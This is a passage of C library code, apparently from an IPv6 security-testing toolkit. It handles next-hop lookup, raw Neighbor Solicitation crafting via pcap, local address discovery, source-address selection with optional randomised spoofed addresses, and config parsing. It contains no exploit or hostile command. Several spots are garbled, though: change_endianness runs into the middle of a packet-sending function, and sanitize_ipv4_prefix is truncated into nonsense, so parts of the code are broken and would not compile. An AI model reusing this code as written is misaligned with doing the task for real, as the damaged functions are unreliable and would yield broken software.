(filters->acceptlinksrc= malloc(sizeof(struct ether_addr) * MAX_ACCEPT_LINK_SRC)) == NULL) return(-1); if( (filters->acceptlinkdst= malloc(sizeof(struct ether_addr) * MAX_ACCEPT_LINK_DST)) == NULL) return(-1); if( (filters->acceptsrclen= malloc(sizeof(u_int8_t) * MAX_ACCEPT_SRC)) == NULL) return(-1); if( (filters->acceptdstlen= malloc(sizeof(u_int8_t) * MAX_ACCEPT_DST)) == NULL) return(-1); if( (filters->accepttargetlen= malloc(sizeof(u_int8_t) * MAX_ACCEPT_TARGET)) == NULL) return(-1); return(0); } /* * Function: sel_next_hop_ra() * * Performs next hop determination by sending the necessary packets * */ int sel_next_hop_ra(struct iface_data *idata){ /* Select link-layer destination address + If the underlying interface is loopback or tunnel, there is no need to select a link-layer destination address + If a link-layer Destination Address has been specified, we do not need to select one + If the destination address is link-local, there is no need to perform next-hop determination + Otherwise we need to learn the local router or do ND as a last ressort */ if((idata->type == DLT_EN10MB && (idata->flags != IFACE_LOOPBACK && idata->flags != IFACE_TUNNEL)) && \ (!(idata->hdstaddr_f) && idata->dstaddr_f)){ if(IN6_IS_ADDR_LINKLOCAL(&(idata->dstaddr))){ /* If the IPv6 Destination Address is a multicast address, there is no need to perform Neighbor Discovery */ if(IN6_IS_ADDR_MC_LINKLOCAL(&(idata->dstaddr))){ idata->hdstaddr= ether_multicast(&(idata->dstaddr)); } else if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ if(idata->verbose_f) puts("Error while performing Neighbor Discovery for the Destination Address"); return(-1); } } else if(find_ipv6_router_full(idata->pfd, idata) == 1){ if(match_ipv6_to_prefixes(&(idata->dstaddr), &(idata->prefix_ol))){ /* If address is on-link, we must perform Neighbor Discovery */ if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ if(idata->verbose_f) puts("Error while performing Neighbor Discovery for the Destination Address"); return(-1); } } else{ idata->hdstaddr= idata->router_ether; } } else{ if(idata->verbose_f) puts("Couldn't find local router. Now trying Neighbor Discovery for the target node"); /* * If we were not able to find a local router, we assume the destination is "on-link" (as * a last ressort), and thus perform Neighbor Discovery for that destination */ if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ if(idata->verbose_f) puts("Error while performing Neighbor Discovery for the Destination Address"); return(-1); } } } return(0); } /* * Function: inc_sdev() * * Computes the average increment and standard deviation of an array of u_int32_t's. * The function computes the aforementioned values for network byte order and host byte order, * and returns as a result the set of values with smaller standard deviation. */ int inc_sdev(u_int32_t *s, unsigned int n, u_int32_t *diff_avg, double *diff_sdev){ unsigned int i; u_int32_t *diff, *s2; unsigned long long int diff1_avg, diff2_avg; double diff1_sdev, diff2_sdev; if( (diff=malloc((n-1)*sizeof(u_int32_t))) == NULL) return(-1); diff1_avg= 0; for(i=0; i<(n-1); i++){ diff[i]= s[i+1]-s[i]; diff1_avg+= diff[i]; } diff1_avg= diff1_avg/(n-1); diff1_sdev= 0; for(i=0; i<(n-1); i++) diff1_sdev= diff1_sdev + (diff[i] - diff1_avg) * (diff[i] - diff1_avg); diff1_sdev= sqrt(diff1_sdev/(n-2)); if( (s2=malloc(n * sizeof(u_int32_t))) == NULL) return(-1); memcpy(s2, s, n* sizeof(u_int32_t)); change_endianness(s2, n); diff2_avg= 0; for(i=0; i<(n-1); i++){ diff[i]= s2[i+1]-s2[i]; diff2_avg+= diff[i]; } diff2_avg= diff2_avg/(n-1); diff2_sdev= 0; for(i=0; i<(n-1); i++) diff2_sdev= diff2_sdev + (diff[i] - diff2_avg) * (diff[i] - diff2_avg); diff2_sdev= sqrt(diff2_sdev/(n-2)); free(diff); free(s2); if(diff1_sdev <= diff2_sdev){ *diff_avg= diff1_avg; *diff_sdev= diff1_sdev; } else{ *diff_avg= diff2_avg; *diff_sdev= diff2_sdev; } return(0); } /* * Function: change_endianness() * * Changes the endianness of an array of u_int32_t's */ void change_endianness(u_int32_t *s, unsigned int n){ unsigned int i; union { u_int32_t ui; unsigned char c[4]; } swapper; unsigned char c; for(i=0; imtu; ether = (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; ether->src = idata->ether; ether->dst = ether_multicast(&(ipv6->ip6_dst)); ether->ether_type = htons(ETHERTYPE_IPV6); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= solicited_node(&(idata->dstaddr)); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_neighbor_solicit)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while inserting Neighbor Solicitation header"); return(-1); } ns= (struct nd_neighbor_solicit *) (ptr); ns->nd_ns_type = ND_NEIGHBOR_SOLICIT; ns->nd_ns_code = 0; ns->nd_ns_reserved = 0; ns->nd_ns_target = *target; ptr += sizeof(struct nd_neighbor_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("NS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy( &(idata->ether.a), sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); ns->nd_ns_cksum = 0; ns->nd_ns_cksum = in_chksum(v6buffer, ns, ptr-((unsigned char *)ns), IPPROTO_ICMPV6); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr-buffer)){ if(idata->verbose_f > 1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(-1); } return 0; } #ifdef __linux__ /* * Function: sel_next_hop() * * Find the next hop for a target destination */ int sel_next_hop(struct iface_data *idata){ int sockfd; struct sockaddr_nl addr, them; int ret; pid_t pid; char reply[MAX_NLPAYLOAD]; struct msghdr msg; struct iovec iov; struct nlrequest req; struct nlmsghdr *nlp; struct rtmsg *rtp; struct rtattr *rtap; int nll,rtl; unsigned char skip_f; if( (sockfd=socket(AF_NETLINK,SOCK_RAW,NETLINK_ROUTE)) == -1){ if(idata->verbose_f) puts("Error in socket()"); return(FAILURE); } memset((void *)&addr, 0, sizeof(addr)); addr.nl_family = AF_NETLINK; addr.nl_pid = pid= getpid(); addr.nl_groups = RTMGRP_IPV6_ROUTE; if(bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != 0){ if(idata->verbose_f) puts("Error in bind()"); close(sockfd); return(FAILURE); } memset(&req, 0, sizeof(req)); req.nl.nlmsg_len = NLMSG_LENGTH(sizeof(struct rtmsg)); req.nl.nlmsg_flags = NLM_F_REQUEST; req.nl.nlmsg_type = RTM_GETROUTE; req.rt.rtm_family= AF_INET6; rtap = (struct rtattr *) req.buf; /* Destination Address */ if(idata->dstaddr_f){ rtap->rta_type = RTA_DST; rtap->rta_len = RTA_SPACE(sizeof(idata->dstaddr)); memcpy(RTA_DATA(rtap), &(idata->dstaddr), sizeof(idata->dstaddr)); req.nl.nlmsg_len += rtap->rta_len; } /* Source Address */ if(idata->srcaddr_f){ rtap = (struct rtattr *)((char *)rtap + (rtap->rta_len)); rtap->rta_type = RTA_SRC; rtap->rta_len = RTA_SPACE(sizeof(idata->srcaddr)); memcpy(RTA_DATA(rtap), &(idata->srcaddr), sizeof(idata->srcaddr)); req.nl.nlmsg_len += rtap->rta_len; } /* address it */ memset(&them, 0, sizeof(them)); them.nl_family = AF_NETLINK; memset(&msg, 0, sizeof(msg)); msg.msg_name = (void *)&them; msg.msg_namelen = sizeof(them); iov.iov_base = (void *) &req.nl; iov.iov_len = req.nl.nlmsg_len; msg.msg_iov = &iov; msg.msg_iovlen = 1; /* send it */ if( (ret = sendmsg(sockfd, &msg, 0)) < 0){ if(idata->verbose_f) puts("Error in send()"); close(sockfd); return(FAILURE); } memset(reply, 0, sizeof(reply)); if( (ret = recv(sockfd, reply, sizeof(reply), 0)) < 0){ if(idata->verbose_f) puts("Error in recv()"); close(sockfd); return(FAILURE); } nll = ret; /* This should eventually be improved to handle the case where messages are lost, since Netlink messages reliable. */ for(nlp = (struct nlmsghdr *)reply; NLMSG_OK(nlp,nll); nlp = NLMSG_NEXT(nlp, nll)){ rtp = (struct rtmsg *) NLMSG_DATA(nlp); skip_f=0; if(rtp->rtm_family == AF_INET6){ for(rtap = (struct rtattr *) RTM_RTA(rtp), rtl = RTM_PAYLOAD(nlp); RTA_OK(rtap, rtl); rtap = RTA_NEXT(rtap,rtl)) { switch(rtap->rta_type){ case RTA_DST: /* XXX If Destination is different from Destination Address, this just means that we need to send our packets to a local router if(!is_eq_in6_addr(&(idata->dstaddr), (struct in6_addr *) RTA_DATA(rtap))) skip_f=1; */ break; case RTA_OIF: idata->nhifindex= *((int *) RTA_DATA(rtap)); if(if_indextoname(idata->nhifindex, idata->nhiface) == NULL){ if(idata->verbose_f) puts("Error calling if_indextoname() from sel_next_hop()"); } idata->nhifindex_f= 1; break; case RTA_GATEWAY: idata->nhaddr= *( (struct in6_addr *) RTA_DATA(rtap)); idata->nhaddr_f= 1; break; } if(skip_f) break; } if(skip_f) continue; } } close(sockfd); if(idata->nhifindex_f){ idata->nh_f=TRUE; return(SUCCESS); } else return(FAILURE); } #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) /* * Function: sel_next_hop() * * Find the next hop for a target destination */ int sel_next_hop(struct iface_data *idata){ int sockfd; pid_t pid; int seq; unsigned int queries=0; char reply[MAX_RTPAYLOAD]; struct rt_msghdr *rtm; struct sockaddr_in6 *sin6; struct sockaddr_dl *sockpptr; struct sockaddr *sa; unsigned char onlink_f=FALSE; if( (sockfd=socket(AF_ROUTE, SOCK_RAW, 0)) == -1){ if(idata->verbose_f) puts("Error in socket() call from sel_next_hop()"); return(FAILURE); } idata->nhaddr= idata->dstaddr; do{ rtm= (struct rt_msghdr *) reply; memset(rtm, 0, sizeof(struct rt_msghdr)); rtm->rtm_msglen= sizeof(struct rt_msghdr) + sizeof(struct sockaddr_in6); rtm->rtm_version= RTM_VERSION; rtm->rtm_type= RTM_GET; rtm->rtm_addrs= RTA_DST; rtm->rtm_pid= pid= getpid(); rtm->rtm_seq= seq= random(); sin6= (struct sockaddr_in6 *) (rtm + 1); memset(sin6, 0, sizeof(struct sockaddr_in6)); sin6->sin6_len= sizeof(struct sockaddr_in6); sin6->sin6_family= AF_INET6; sin6->sin6_addr= idata->nhaddr; if(write(sockfd, rtm, rtm->rtm_msglen) == -1){ if(idata->verbose_f) puts("No route to the intenteded destination in the local routing table"); return(FAILURE); } do{ if( (read(sockfd, rtm, MAX_RTPAYLOAD)) < 0){ puts("Error in read() call from sel_next_hop()"); exit(1); } }while( rtm->rtm_type != RTM_GET || rtm->rtm_pid != pid || rtm->rtm_seq != seq); queries++; /* The rt_msghdr{} structure is fllowed by sockaddr structures */ sa= (struct sockaddr *) (rtm+1); if(rtm->rtm_addrs & RTA_DST) SA_NEXT(sa); if(rtm->rtm_addrs & RTA_GATEWAY){ if(sa->sa_family == AF_INET6){ idata->nhaddr= ((struct sockaddr_in6 *) sa)->sin6_addr; idata->nhaddr_f=TRUE; } else if(sa->sa_family == AF_LINK){ sockpptr = (struct sockaddr_dl *) (sa); idata->nhifindex= sockpptr->sdl_index; idata->nhifindex_f=TRUE; if(if_indextoname(idata->nhifindex, idata->nhiface) == NULL){ puts("Error calling if_indextoname() from sel_next_hop()"); } onlink_f=TRUE; } } }while(!onlink_f && queries < 2); close(sockfd); if(idata->nhifindex_f){ if(IN6_IS_ADDR_LINKLOCAL(&(idata->nhaddr))){ /* BSDs store the interface index in s6_addr16[1], so we must clear it */ idata->nhaddr.s6_addr16[1] =0; idata->nhaddr.s6_addr16[2] =0; idata->nhaddr.s6_addr16[3] =0; } return(SUCCESS); } else return(FAILURE); } #endif /* * Function: get_local_addrs() * * Obtains all local addresses (Ethernet and IPv6 addresses for all interfaces) */ int get_local_addrs(struct iface_data *idata){ struct iface_entry *cif; struct ifaddrs *ifptr, *ptr; struct sockaddr_in6 *sockin6ptr; #ifdef __linux__ struct sockaddr_ll *sockpptr; #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) struct sockaddr_dl *sockpptr; #endif if(getifaddrs(&ifptr) != 0){ if(idata->verbose_f > 1){ puts("Error in call to getifaddrs()"); } return(FAILURE); } for(ptr=ifptr; ptr != NULL; ptr= ptr->ifa_next){ if(ptr->ifa_addr == NULL) continue; if( (cif = find_iface_by_name( &(idata->iflist), ptr->ifa_name)) == NULL){ if(idata->iflist.nifaces >= MAX_IFACES) continue; else{ cif= &(idata->iflist.ifaces[idata->iflist.nifaces]); strncpy(cif->iface, ptr->ifa_name, IFACE_LENGTH-1); cif->iface[IFACE_LENGTH-1]=0; idata->iflist.nifaces++; } } #ifdef __linux__ if((ptr->ifa_addr)->sa_family == AF_PACKET){ sockpptr = (struct sockaddr_ll *) (ptr->ifa_addr); if(sockpptr->sll_halen == ETHER_ADDR_LEN){ memcpy(&(cif->ether), sockpptr->sll_addr, ETHER_ADDR_LEN); } cif->ifindex= sockpptr->sll_ifindex; } #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) if((ptr->ifa_addr)->sa_family == AF_LINK){ sockpptr = (struct sockaddr_dl *) (ptr->ifa_addr); if(sockpptr->sdl_alen == ETHER_ADDR_LEN){ memcpy(&(cif->ether), (sockpptr->sdl_data + sockpptr->sdl_nlen), ETHER_ADDR_LEN); } cif->ifindex= sockpptr->sdl_index; } #endif else if((ptr->ifa_addr)->sa_family == AF_INET6){ sockin6ptr= (struct sockaddr_in6 *) (ptr->ifa_addr); if(IN6_IS_ADDR_LINKLOCAL( &(sockin6ptr->sin6_addr))){ if(cif->ip6_local.nprefix >= cif->ip6_local.maxprefix) continue; if(is_ip6_in_prefix_list( &(sockin6ptr->sin6_addr), &(cif->ip6_local)) == TRUE) continue; if( (cif->ip6_local.prefix[cif->ip6_local.nprefix] = malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f > 1) puts("Error while storing Source Address"); freeifaddrs(ifptr); return(FAILURE); } (cif->ip6_local.prefix[cif->ip6_local.nprefix])->len = 128; (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6 = sockin6ptr->sin6_addr; #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) /* BSDs store the interface index in s6_addr16[1], so we must clear it */ (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6.s6_addr16[1] =0; (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6.s6_addr16[2] =0; (cif->ip6_local.prefix[cif->ip6_local.nprefix])->ip6.s6_addr16[3] =0; #endif cif->ip6_local.nprefix++; } else if(!IN6_IS_ADDR_LINKLOCAL( &(sockin6ptr->sin6_addr))){ if(is_ip6_in_prefix_list( &(sockin6ptr->sin6_addr), &(cif->ip6_global))) continue; if(IN6_IS_ADDR_LOOPBACK(&(sockin6ptr->sin6_addr))) cif->flags= IFACE_LOOPBACK; if(cif->ip6_global.nprefix >= cif->ip6_global.maxprefix) continue; if( (cif->ip6_global.prefix[cif->ip6_global.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f > 1) puts("Error while storing Source Address"); freeifaddrs(ifptr); return(FAILURE); } (cif->ip6_global.prefix[cif->ip6_global.nprefix])->len = 128; (cif->ip6_global.prefix[cif->ip6_global.nprefix])->ip6 = sockin6ptr->sin6_addr; cif->ip6_global.nprefix++; } } } freeifaddrs(ifptr); return(SUCCESS); } /* * Function: find_iface_by_name() * * Finds an Interface (by name) in an Interface list */ void *find_iface_by_name(struct iface_list *iflist, char *iface){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if(strncmp((iflist->ifaces[i]).iface, iface, IFACE_LENGTH) == 0) return(&(iflist->ifaces[i])); } return(NULL); } /* * Function: find_iface_by_index() * * Finds an Interface (by index) in an Interface list */ void *find_iface_by_index(struct iface_list *iflist, int ifindex){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if((iflist->ifaces[i]).ifindex == ifindex) return(&(iflist->ifaces[i])); } return(NULL); } /* * Function: is_in6addr_iniface_list() * * Finds an Interface (by name) in an Interface list */ int is_ip6_in_iface_entry(struct iface_list *iflist, int ifindex, struct in6_addr *addr){ unsigned int i; for(i=0; i < iflist->nifaces; i++){ if(iflist->ifaces[i].ifindex == ifindex){ if(is_ip6_in_prefix_list(addr, &(iflist->ifaces[i].ip6_global))) return(TRUE); else if(is_ip6_in_prefix_list(addr, &(iflist->ifaces[i].ip6_local))) return(TRUE); } } return(FALSE); } /* * Function: find_matching_address() * * Finds the longest matching address in an Interface list */ struct iface_entry *find_matching_address(struct iface_data *idata, struct iface_list *iflist, struct in6_addr *dst, struct in6_addr *match){ unsigned int i, j, mlen, len; struct iface_entry *cif=NULL; /* Not needed, but avoids warning in OpenBSD/gcc */ mlen= 0; for(i=0; i < iflist->nifaces; i++){ if(idata->iface_f && (idata->ifindex != (iflist->ifaces[i]).ifindex)) continue; for(j=0; j < (iflist->ifaces[i]).ip6_local.nprefix; j++){ if( (len= ip6_longest_match( &((iflist->ifaces[i].ip6_local.prefix[j])->ip6), dst)) >= mlen){ cif= &(iflist->ifaces[i]); *match= (iflist->ifaces[i].ip6_local.prefix[j])->ip6; mlen= len; } if(mlen >= 64){ return(cif); } } for(j=0; j < (iflist->ifaces[i]).ip6_global.nprefix; j++){ if( (len= ip6_longest_match( &((iflist->ifaces[i].ip6_global.prefix[j])->ip6), dst)) >= mlen){ cif= &(iflist->ifaces[i]); *match= (iflist->ifaces[i].ip6_global.prefix[j])->ip6; mlen= len; } if(mlen >= 64){ return(cif); } } } return(cif); } /* * Function: ip6_longest_match() * * Finds the mask that two IPv6 addresses have in common */ unsigned int ip6_longest_match(struct in6_addr *addr1, struct in6_addr *addr2){ unsigned int mask, step=8; struct in6_addr a1, a2; for(mask=0; mask <= 64; mask=mask+step){ a1= *addr1; a2= *addr2; sanitize_ipv6_prefix(&a1, mask); sanitize_ipv6_prefix(&a2, mask); if(!is_eq_in6_addr(&a1, &a2)) return(mask - step); } return(64); } /* * Function: sel_src_addr() * * Selects a Source Address for a given Destination */ int sel_src_addr(struct iface_data *idata){ struct in6_addr match; struct iface_entry *cif; /* If the packet is directed to a link-local addresses, the ourgoing interface should have been specified. If not, that's a failure. If specified, we give higher priority to link-local addresses */ if(IN6_IS_ADDR_LINKLOCAL(&(idata->dstaddr))){ if(!idata->iface_f){ return(FAILURE); } else{ if( (cif=find_iface_by_index( &(idata->iflist), idata->ifindex)) == NULL){ return(FAILURE); } else{ idata->ether= cif->ether; idata->ether_flag= TRUE; idata->flags= cif->flags; if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } idata->ip6_global= cif->ip6_global; if((idata->ip6_global).nprefix) idata->ip6_global_flag= TRUE; if(idata->ip6_local_flag == TRUE){ idata->srcaddr= (cif->ip6_local.prefix[0])->ip6; return(SUCCESS); } else if(idata->ip6_global_flag == TRUE){ idata->srcaddr= (cif->ip6_local.prefix[0])->ip6; return(SUCCESS); } } } } else{ /* If the destination address is not a link-local address, then: 1) If the interface has been specified, we select an IPv6 address assigned to that interface (prioritizing "global" addresses) 2) If an interface has not been specified, we select the longest-matching address for that destination */ if(idata->iface_f){ if( (cif=find_iface_by_index( &(idata->iflist), idata->ifindex)) == NULL){ return(FAILURE); } else{ idata->ether= cif->ether; idata->ether_flag= TRUE; idata->flags= cif->flags; idata->ip6_global= cif->ip6_global; if(cif->ip6_global.nprefix){ idata->ip6_global_flag= TRUE; } if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } if(idata->ip6_global_flag){ /* XXX This should be replaced with "find the longest match for this list */ idata->srcaddr= (idata->ip6_global).prefix[0]->ip6; return(SUCCESS); } else if(idata->ip6_local_flag){ idata->srcaddr= idata->ip6_local; return(SUCCESS); } } } else{ if( (cif=find_matching_address(idata, &(idata->iflist), &(idata->dstaddr), &match)) != NULL){ idata->srcaddr= match; strncpy(idata->iface, cif->iface, IFACE_LENGTH-1); idata->iface[IFACE_LENGTH-1]= 0; idata->ifindex= cif->ifindex; idata->ifindex_f= TRUE; idata->flags= cif->flags; /* We know check whether the selected address belongs to the outgoing interface -- otherwise packets might be filtered */ if(sel_next_hop(idata) == SUCCESS){ if(is_ip6_in_iface_entry(&(idata->iflist), idata->nhifindex, &(idata->srcaddr)) == TRUE){ if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } idata->ip6_global= cif->ip6_global; if((idata->ip6_global).nprefix) idata->ip6_global_flag= TRUE; idata->ether= cif->ether; idata->ether_flag= TRUE; return(SUCCESS); } else{ /* If the seleted address doesn't correspond to the outgoing interface, throw away the previously-selected IPv6 Address, and select one that is assigned to the outgoing interface. */ if( (cif= find_iface_by_index(&(idata->iflist), idata->nhifindex)) == NULL){ return(FAILURE); } else{ idata->ether= cif->ether; idata->ether_flag= TRUE; idata->ifindex= idata->nhifindex; idata->flags= cif->flags; strncpy(idata->iface, idata->nhiface, IFACE_LENGTH-1); if((cif->ip6_local).nprefix){ idata->ip6_local= (cif->ip6_local).prefix[0]->ip6; idata->ip6_local_flag= TRUE; } idata->ip6_global= cif->ip6_global; if((idata->ip6_global).nprefix) idata->ip6_global_flag= TRUE; if(!IN6_IS_ADDR_LINKLOCAL(&(idata->dstaddr))){ if(idata->ip6_global_flag == TRUE){ idata->srcaddr= (cif->ip6_global.prefix[0])->ip6; return(SUCCESS); } else if(idata->ip6_local_flag){ idata->srcaddr= idata->ip6_local; return(SUCCESS); } } else{ if(idata->ip6_local_flag){ idata->srcaddr= idata->ip6_local; return(SUCCESS); } else if(idata->ip6_global_flag){ idata->srcaddr= (cif->ip6_global.prefix[0])->ip6; return(SUCCESS); } } } } } } } } return(FAILURE); } /* * Function: load_dst_and_pcap() * * Finds the Sorurce Address, Next-Hop, and outgoing interface for a given Destination Address */ int load_dst_and_pcap(struct iface_data *idata, unsigned int mode){ struct iface_entry *cif; struct in6_addr randprefix; unsigned char randpreflen; char errbuf[PCAP_ERRBUF_SIZE]; if(mode != LOAD_PCAP_ONLY){ if(idata->srcprefix_f){ randprefix= idata->srcaddr; randpreflen= idata->srcpreflen; randomize_ipv6_addr(&(idata->srcaddr), &randprefix, randpreflen); idata->srcaddr_f=1; } else if(!idata->srcaddr_f){ if(get_local_addrs(idata) == FAILURE){ puts("Error while obtaining local addresses"); return(FAILURE); } /* If no source address or prefix have been specified, then we need to automatically learn our IPv6 address. This is our appraoch: * Firstly, assume that our host has IPv6 connectivity: + If an interface has been specified, select an IPv6 address from one of the configures addresses of such interface. * If an interface has not been specified, select a source address taking into consideration all configured addresses. * If that doesn't succeed, try sending RAs */ if(sel_src_addr(idata) == SUCCESS){ if(sel_next_hop(idata) == SUCCESS){ idata->nh_f= TRUE; } } if(idata->nh_f == FALSE){ /* XXX Should really free the memory allocated by the other functions, since they are of no further use */ idata->ip6_local_flag= FALSE; idata->ip6_global.nprefix=0; idata->ip6_global_flag= FALSE; if(!idata->iface_f){ if(idata->verbose_f) puts("Could not determine next hop address"); return(FAILURE); } /* This sends an RA, populates the local addresses and prefixes, and the local router */ if(sel_next_hop_ra(idata) == -1){ puts("Could not learn a local router"); return(FAILURE); } if(sel_src_addr_ra(idata, &(idata->dstaddr)) == FAILURE || !idata->ether_flag || !idata->ip6_global_flag || !idata->ip6_local_flag){ puts("Could not obtain local address **"); return(FAILURE); } idata->ifindex= if_nametoindex(idata->iface); idata->ifindex_f= TRUE; } } else{ if(get_local_addrs(idata) == FAILURE){ if(idata->verbose_f) puts("Error while obtaining local addresses"); return(FAILURE); } if(sel_next_hop(idata) == SUCCESS){ idata->ifindex= idata->nhifindex; idata->nh_f= TRUE; strncpy(idata->iface, idata->nhiface, IFACE_LENGTH-1); idata->iface[IFACE_LENGTH-1]=0; if( (cif=find_iface_by_index(&(idata->iflist), idata->ifindex)) != NULL){ idata->ether= cif->ether; idata->ether_flag= TRUE; } } else{ /* This sends an RA, populates the local addresses and prefixes, and the local router */ if(sel_next_hop_ra(idata) == -1){ puts("Could not learn a local router"); return(FAILURE); } } } } else{ if(!idata->iface_f){ if(idata->verbose_f){ puts("Error opening pcap socket because interface was not specified"); } return(FAILURE); } idata->ifindex= if_nametoindex(idata->iface); idata->ifindex_f= TRUE; if(get_if_addrs(idata) == -1){ if(idata->verbose_f){ puts("Error while obtaining local interface data"); } return(FAILURE); } } if(!(idata->hsrcaddr_f)){ if(idata->ether_flag) idata->hsrcaddr=idata->ether; else randomize_ether_addr(&(idata->hsrcaddr)); } if(!idata->ip6_local_flag){ ether_to_ipv6_linklocal(&idata->ether, &idata->ip6_local); } if( (idata->pfd= pcap_open_live(idata->iface, PCAP_SNAP_LEN, PCAP_PROMISC, PCAP_TIMEOUT, errbuf)) == NULL){ printf("pcap_open_live(%s): %s\n", idata->iface, errbuf); return(FAILURE); } if( (idata->fd= pcap_fileno(idata->pfd)) == -1){ if(idata->verbose_f) puts("Error obtaining descriptor number for pcap_t"); return(FAILURE); } if( (idata->type = pcap_datalink(idata->pfd)) == DLT_EN10MB){ idata->linkhsize= ETH_HLEN; idata->mtu= ETH_DATA_LEN; } else if( idata->type == DLT_RAW){ idata->linkhsize=0; idata->mtu= MIN_IPV6_MTU; idata->flags= IFACE_TUNNEL; } else if(idata->type == DLT_NULL){ idata->linkhsize=4; idata->mtu= MIN_IPV6_MTU; idata->flags= IFACE_TUNNEL; } else{ printf("Error: Interface %s is not an Ethernet or tunnel interface", idata->iface); return(FAILURE); } if(mode == LOAD_PCAP_ONLY) return(SUCCESS); if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ if(ipv6_to_ether(idata->pfd, idata, &(idata->nhaddr), &(idata->nhhaddr)) != 1){ puts("Error while performing Neighbor Discovery for the Destination Address"); return(FAILURE); } } idata->hdstaddr= idata->nhhaddr; return(SUCCESS); } /* * sanitize_ipv4_prefix() * * Clears those bits in an IPv4 address that are not within a prefix length. */ void sanitize_ipv4_prefix(struct prefix4_entry *prefix4){ unsigned int clear, i; in_addr_t mask=0xffffffff; clear= 32-prefix4->len; for(i=0; i>1; for(i=0; iip.s_addr= prefix4->ip.s_addr & htonl(mask); } /* * Function: is_ip6_in_list() * * Checks whether an IPv6 address is present in an address list. */ int is_ip6_in_list(struct in6_addr *target, struct host_list *hlist){ unsigned int i; for(i=0; i < hlist->nhosts; i++) if(is_eq_in6_addr(target, &((hlist->host[i])->ip6))) return 1; return 0; } /* * Function: dec_to_hex() * * Convert a decimal number into a number that has the same representation in hexadecimal */ u_int16_t dec_to_hex(u_int16_t n){ u_int16_t r=0; unsigned int d, i; /* The source number is truncated to the first four digits */ n= n%10000; d=1000; for(i=0; i<4; i++){ r= (r << 4) | (n/d); n= n%d; d=d/10; } return(r); } /* * Function: keyval() * * Obtains a (variable, value) pair from a line of text in "variable=value # comments" format */ int keyval(char *line, unsigned int len, char **key, char **val){ char *ptr; ptr= line; /* Skip initial spaces (e.g. " variable=value") */ while( (*ptr==' ' || *ptr=='\t') && ptr < (line+len)) ptr++; /* If we got to end of line or there is a comment or equal sign, there is no (variable, value) pair) */ if(ptr==(line+len) || *ptr=='#' || *ptr=='=' || *ptr=='\r' || *ptr=='\n') return 0; *key=ptr; /* The variable name is everything till (and excluding) the first separator character (e.g., space or tab) */ while( (*ptr!=' ' && *ptr!='\t' && *ptr!='\r' && *ptr!='\n' && *ptr!='#' && *ptr!='=') && ptr < (line+len)) ptr++; /* If the variable name is followed by a comment sign, or occupies the entire line, there's an error in the config file (i.e., there is no "variable=value" pair) */ if(ptr==(line+len) || *ptr=='#' || *ptr=='\r' || *ptr=='\n') return -1; if(*ptr==' ' || *ptr=='\t'){ /* The variable name is followed by spaces -- skip them, and find the "equal to" sign */ *ptr=0; /* NULL-terminate the key */ ptr++; while(ptr<(line+len) && (*ptr==' ' || *ptr=='\t')) ptr++; if(ptr==(line+len) || *ptr!='=') return -1; ptr++; }else{ /* The variable name is followed by the "equal to" sign */ *ptr=0; ptr++; } /* If the equal sign is followed by spaces, skip them */ while( (*ptr==' ' || *ptr=='\t') && ptr<(line+len)) ptr++; /* We found the "value" in the "variable=value" pair */ *val=ptr; /* The value is everthing till (and excluding) the first separator character */ while( (*ptr!='#' && *ptr!='\r' && *ptr!='\n' && *ptr!='\t' && *ptr!='=' && *ptr!=' ') && ptr < (line+len)) ptr++; /* If the value string was actually "empty", we return an error */ if(ptr == *val) return(-1); *ptr=0; return(1); } /* * Function: address_contains_ranges() * * Checks whether a string contains ranges in the form YYYY-ZZZZ. A string that contains both ranges and a * /length prefix is considered invalid. */ int address_contains_ranges(char *ptr){ unsigned char slash_f=0, dash_f=0; unsigned int i=0; while(i <= (MAX_RANGE_STR_LEN) && *ptr){ if(*ptr == '-') dash_f=1; if(*ptr=='/') slash_f=1; ptr++; i++; } /* If the string contains both slashes and 